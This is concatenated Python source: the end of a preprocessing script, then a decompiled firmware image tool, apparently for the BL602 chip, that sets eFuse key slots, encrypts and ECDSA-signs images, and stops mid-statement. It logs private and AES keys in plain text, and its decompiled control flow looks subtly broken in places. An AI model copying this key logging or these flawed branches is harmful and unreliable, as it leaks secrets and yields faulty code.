random_seed: int = 239, projects_file: str = None, project_folder: str = None, ): fix_seed(random_seed) if project_folder is not None: process_folder(ProcessedFolder(project_folder), n_time_buckets, min_context_train, max_context_train, min_count, max_count, interactive) elif projects_file is not None: projects = [l.strip() for l in open(projects_file, "r").readlines()] for p in projects: process_folder(ProcessedFolder("../gitminer/out/" + p + "/"), n_time_buckets, min_context_train, max_context_train, min_count, max_count, interactive) else: raise ValueError("One of projects folder or projects file should be set") if __name__ == '__main__': parser = ArgumentParser() parser.add_argument("--n_time_buckets", type=int, default=10) parser.add_argument("--min_context_train", type=float, default=0.7) parser.add_argument("--max_context_train", type=float, default=0.8) parser.add_argument("--min_count", type=int, default=100) parser.add_argument("--max_count", type=int, default=int(1e9)) parser.add_argument("--random_seed", type=int, default=239) parser.add_argument("--projects_file", type=str, default="../projects.txt") parser.add_argument("--project_folder", type=str) parser.add_argument("--interactive", action='store_true') args = parser.parse_args() run_preprocessing(args.n_time_buckets, args.min_context_train, args.max_context_train, args.min_count, args.max_count, args.interactive, args.random_seed, args.projects_file, args.project_folder) dkkloimwieder/bl602-reBlDevCube/lib.bl60x.img_create_do.pyc.py # decompyle3 version 3.3.2 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.8.5 (default, Jul 28 2020, 12:59:40) # [GCC 9.3.0] # Embedded file name: lib\bl60x\img_create_do.py import sys, os, hashlib, binascii, getopt from lib import bflb_utils from lib import bflb_aes from lib.bflb_utils import app_path, open_file import ecdsa cfg = bflb_utils.BFConfigParser() keyslot0 = 28 keyslot1 = keyslot0 + 16 keyslot2 = keyslot1 + 16 keyslot3 = keyslot2 + 16 keyslot4 = keyslot3 + 16 keyslot5 = keyslot4 + 16 keyslot6 = 156 keyslot7 = keyslot6 + 16 keyslot8 = keyslot7 + 16 keyslot9 = keyslot8 + 16 keyslot10 = keyslot9 + 16 keyslot11 = keyslot10 + 16 keyslot12 = keyslot11 + 16 rd_lock_key_slot_5 = 31 rd_lock_key_slot_4 = 30 rd_lock_key_slot_3 = 28 rd_lock_key_slot_2 = 28 rd_lock_key_slot_1 = 27 rd_lock_key_slot_0 = 26 rd_lock_dbg_pwd = 23 wr_lock_key_slot_5 = 15 wr_lock_key_slot_4 = 14 wr_lock_key_slot_3 = 13 wr_lock_key_slot_2 = 12 wr_lock_key_slot_1 = 11 wr_lock_key_slot_0 = 10 wr_lock_wifi_mac = 9 wr_lock_chip_id = 8 wr_lock_dbg_pwd = 7 wr_lock_sf_aes_mode = 6 wr_lock_sboot_sign_mode = 5 rd_lock_key_slot_11 = 31 rd_lock_key_slot_10 = 30 rd_lock_key_slot_9 = 29 rd_lock_key_slot_8 = 28 rd_lock_key_slot_7 = 27 rd_lock_key_slot_6 = 26 wr_lock_key_slot_11 = 15 wr_lock_key_slot_10 = 14 wr_lock_key_slot_9 = 13 wr_lock_key_slot_8 = 12 wr_lock_key_slot_7 = 11 wr_lock_key_slot_6 = 10 wr_lock_sw_usage_3 = 9 wr_lock_sw_usage_2 = 8 wr_lock_sw_usage_1 = 7 wr_lock_sw_usage_0 = 6 wr_lock_ana_trim_2 = 5 wr_lock_ana_trim_1 = 4 wr_lock_ana_trim_0 = 3 def img_update_efuse_sp(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): global cfg fp = open_file(cfg.get('Img_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_0 rw_lock0 |= 1 << wr_lock_key_slot_1 if flash_key != None: efuse_data[keyslot2:keyslot4] = flash_key efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot2:keyslot3] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key_sel == 1: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot7:keyslot8] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_4 rw_lock1 |= 1 << rd_lock_key_slot_7 if sec_eng_key_sel == 3: efuse_data[keyslot7:keyslot8] = sec_eng_key[16:32] efuse_data[keyslot2:keyslot3] = sec_eng_key[0:16] efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 efuse_mask_data[keyslot2:keyslot3] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock1 |= 1 << rd_lock_key_slot_7 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = open_file(cfg.get('Img_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_update_efuse_cpu0(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_0 rw_lock0 |= 1 << wr_lock_key_slot_1 if flash_key != None: efuse_data[keyslot2:keyslot4] = flash_key efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot2:keyslot3] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key_sel == 1: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot7:keyslot8] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_4 rw_lock1 |= 1 << rd_lock_key_slot_7 if sec_eng_key_sel == 3: efuse_data[keyslot7:keyslot8] = sec_eng_key[16:32] efuse_data[keyslot2:keyslot3] = sec_eng_key[0:16] efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 efuse_mask_data[keyslot2:keyslot3] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock1 |= 1 << rd_lock_key_slot_7 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_update_efuse_cpu1(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot5:keyslot5 + 16] = pk_hash[0:16] efuse_mask_data[keyslot5:keyslot5 + 16] = mask_4bytes * 4 efuse_data[keyslot6:keyslot7] = pk_hash[16:32] efuse_mask_data[keyslot6:keyslot7] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_5 rw_lock1 |= 1 << wr_lock_key_slot_6 if flash_key != None: efuse_data[keyslot7:keyslot9] = flash_key efuse_mask_data[keyslot7:keyslot9] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_7 rw_lock1 |= 1 << rd_lock_key_slot_8 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot10] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[16:32] efuse_data[keyslot10:keyslot11] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot11] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << wr_lock_key_slot_10 rw_lock1 |= 1 << rd_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_10 if sec_eng_key_sel == 2: efuse_data[keyslot10:keyslot11] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot10:keyslot12] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_10 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_10 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 3: efuse_data[keyslot11:keyslot12] = sec_eng_key[16:32] efuse_data[keyslot8:keyslot9] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot10] = mask_4bytes * 8 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 2: efuse_data[keyslot11:keyslot12] = sec_eng_key[16:32] efuse_data[keyslot8:keyslot9] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if sec_eng_key_sel == 3: efuse_data[keyslot8:keyslot9] = sec_eng_key[16:32] efuse_data[keyslot11:keyslot12] = sec_eng_key[0:16] efuse_mask_data[keyslot8:keyslot9] = mask_4bytes * 4 efuse_mask_data[keyslot11:keyslot12] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_8 rw_lock1 |= 1 << wr_lock_key_slot_11 rw_lock1 |= 1 << rd_lock_key_slot_8 rw_lock1 |= 1 << rd_lock_key_slot_11 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 1: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 2: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 if sec_eng_key_sel == 3: efuse_data[keyslot9:keyslot10] = sec_eng_key[0:16] efuse_mask_data[keyslot9:keyslot10] = mask_4bytes * 4 rw_lock1 |= 1 << wr_lock_key_slot_9 rw_lock1 |= 1 << rd_lock_key_slot_9 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_create_get_sign_encrypt_info(bootheader_data): sign = bootheader_data[116] & 3 encrypt = bootheader_data[116] >> 2 & 3 key_sel = bootheader_data[116] >> 4 & 3 return ( sign, encrypt, key_sel) def img_create_get_hash_ignore(bootheader_data): return bootheader_data[118] >> 1 & 1 def img_create_get_crc_ignore(bootheader_data): return bootheader_data[118] & 1 def img_create_update_bootheader(bootheader_data, hash, seg_cnt): bootheader_data[120:124] = bflb_utils.int_to_4bytearray_l(seg_cnt) sign, encrypt, key_sel = img_create_get_sign_encrypt_info(bootheader_data) if img_create_get_hash_ignore(bootheader_data) == 1 and sign == 0: bflb_utils.printf('Hash ignored') else: bootheader_data[132:164] = hash if img_create_get_crc_ignore(bootheader_data) == 1: bflb_utils.printf('Header crc ignored') else: hd_crcarray = bflb_utils.get_crc32_bytearray(bootheader_data[0:172]) bootheader_data[172:176] = hd_crcarray bflb_utils.printf('Header crc: ', binascii.hexlify(hd_crcarray).decode('utf-8')) return bootheader_data def img_create_update_segheader(segheader, segdatalen, segdatacrc): segheader[4:8] = segdatalen segheader[8:12] = segdatacrc return segheader def img_create_sha256_data(data_bytearray): hashfun = hashlib.sha256() hashfun.update(data_bytearray) return bflb_utils.hexstr_to_bytearray(hashfun.hexdigest()) def img_create_encrypt_data(data_bytearray, key_bytearray, iv_bytearray, flash_img): if flash_img == 0: cryptor = bflb_aes.AESModeOfOperationCBC(key_bytearray, iv=iv_bytearray) ciphertext = cryptor.encrypt(data_bytearray) else: iv = bflb_aes.Counter(initial_value=(int(binascii.hexlify(iv_bytearray), 16))) cryptor = bflb_aes.AESModeOfOperationCTR(key_bytearray, counter=iv) ciphertext = cryptor.encrypt(data_bytearray) return ciphertext def img_create_sign_data(data_bytearray, privatekey_file_uecc, publickey_file): sk = ecdsa.SigningKey.from_pem(open_file(privatekey_file_uecc).read()) vk = ecdsa.VerifyingKey.from_pem(open_file(publickey_file).read()) pk_data = vk.to_string() bflb_utils.printf('Private key: ', binascii.hexlify(sk.to_string())) bflb_utils.printf('Public key: ', binascii.hexlify(pk_data)) pk_hash = img_create_sha256_data(pk_data) bflb_utils.printf('Public key hash=', binascii.hexlify(pk_hash)) signature = sk.sign(data_bytearray, hashfunc=(hashlib.sha256), sigencode=(ecdsa.util.sigencode_string)) bflb_utils.printf('Signature=', binascii.hexlify(signature)) len_array = bflb_utils.int_to_4bytearray_l(len(signature)) sig_field = len_array + signature crcarray = bflb_utils.get_crc32_bytearray(sig_field) return ( pk_data, pk_hash, sig_field + crcarray) def img_create_read_file_append_crc(file, crc): fp = open_file(file, 'rb') read_data = bytearray(fp.read()) crcarray = bytearray(0) if crc: crcarray = bflb_utils.get_crc32_bytearray(read_data) fp.close() return read_data + crcarray def img_creat_process(img_type, flash_img): global encrypt_key encrypt_blk_size = 16 padding = bytearray(encrypt_blk_size) data_tohash = bytearray(0) ret = 'OK' if img_type == 'cpu0': img_update_efuse_fun = img_update_efuse_cpu0 cfg_section = 'Img_CPU0_Cfg' elif img_type == 'cpu1': img_update_efuse_fun = img_update_efuse_cpu1 cfg_section = 'Img_CPU1_Cfg' else: img_update_efuse_fun = img_update_efuse_sp cfg_section = 'Img_Cfg' segheader_file = [] if flash_img == 0: for files in cfg.get(cfg_section, 'segheader_file').split(' '): segheader_file.append(str(files)) segdata_file = [] for files in cfg.get(cfg_section, 'segdata_file').split(' '): segdata_file.append(str(files)) if flash_img == 1: break boot_header_file = cfg.get(cfg_section, 'boot_header_file') bootheader_data = img_create_read_file_append_crc(boot_header_file, 0) encrypt = 0 sign, encrypt, key_sel = img_create_get_sign_encrypt_info(bootheader_data) aesiv_data = bytearray(0) pk_data = bytearray(0) if sign != 0: bflb_utils.printf('Image need sign') publickey_file = cfg.get(cfg_section, 'publickey_file') privatekey_file_uecc = cfg.get(cfg_section, 'privatekey_file_uecc') if encrypt != 0: bflb_utils.printf('Image need encrypt ', encrypt) encrypt_key_org = bflb_utils.hexstr_to_bytearray(cfg.get(cfg_section, 'aes_key_org')) if encrypt == 1: encrypt_key = encrypt_key_org[0:16] elif encrypt == 2: encrypt_key = encrypt_key_org[0:32] elif encrypt == 3: encrypt_key = encrypt_key_org[0:24] bflb_utils.printf('Key= ', binascii.hexlify(encrypt_key)) encrypt_iv = bflb_utils.hexstr_to_bytearray(cfg.get(cfg_section, 'aes_iv')) iv_crcarray = bflb_utils.get_crc32_bytearray(encrypt_iv) aesiv_data = encrypt_iv + iv_crcarray data_tohash = data_tohash + aesiv_data seg_cnt = len(segheader_file) if flash_img == 0: if seg_cnt != len(segdata_file): bflb_utils.printf('Segheader count and segdata count not match') return ( 'FAIL', data_tohash) data_toencrypt = bytearray(0) if flash_img == 0: i = 0 seg_header_list = [] seg_data_list = [] while i < seg_cnt: seg_data = img_create_read_file_append_crc(segdata_file[i], 0) padding_size = 0 if len(seg_data) % encrypt_blk_size != 0: padding_size = encrypt_blk_size - len(seg_data) % encrypt_blk_size seg_data += padding[0:padding_size] else: segdata_crcarray = bflb_utils.get_crc32_bytearray(seg_data) seg_data_list.append(seg_data) seg_header = img_create_read_file_append_crc(segheader_file[i], 0) seg_header = img_create_update_segheader(seg_header, bflb_utils.int_to_4bytearray_l(len(seg_data)), segdata_crcarray) segheader_crcarray = bflb_utils.get_crc32_bytearray(seg_header) seg_header = seg_header + segheader_crcarray seg_header_list.append(seg_header) i = i + 1 i = 0 while i < seg_cnt: data_toencrypt += seg_header_list[i] data_toencrypt += seg_data_list[i] i += 1 else: seg_data = img_create_read_file_append_crc(segdata_file[0], 0) padding_size = 0 if len(seg_data) % encrypt_blk_size != 0: padding_size = encrypt_blk_size - len(seg_data) % encrypt_blk_size seg_data += padding[0:padding_size] data_toencrypt += seg_data seg_cnt = len(data_toencrypt) if encrypt != 0: data_toencrypt = img_create_encrypt_data(data_toencrypt, encrypt_key, encrypt_iv, flash_img) fw_data = bytearray(0) data_tohash += data_toencrypt fw_data = data_toencrypt hash = img_create_sha256_data(data_tohash) bflb_utils.printf('Image hash is ', binascii.hexlify(hash).decode('utf-8')) bootheader_data = img_create_update_bootheader(bootheader_data, hash, seg_cnt) signature = bytearray(0) pk_hash = None if sign == 1: pk_data, pk_hash, signature = img_create_sign_data(data_tohash, privatekey_file_uecc, publickey_file) pk_data = pk_data + bflb_utils.get_crc32_bytearray(pk_data) if flash_img == 1: bflb_utils.printf('Write flash img') bootinfo_file_name = cfg.get(cfg_section, 'bootinfo_file') fp = open_file(bootinfo_file_name, 'wb+') bootinfo = bootheader_data + pk_data + pk_data + signature + signature + aesiv_data fp.write(bootinfo) fp.close() fw_file_name = cfg.get(cfg_section, 'img_file') fp = open_file(fw_file_name, 'wb+') fp.write(fw_data) fp.close() if encrypt != 0: if encrypt == 1: img_update_efuse_fun(sign, pk_hash, 1, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) if encrypt == 2: img_update_efuse_fun(sign, pk_hash, 3, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) if encrypt == 3: img_update_efuse_fun(sign, pk_hash, 2, encrypt_key + bytearray(32 - len(encrypt_key)), key_sel, None) else: 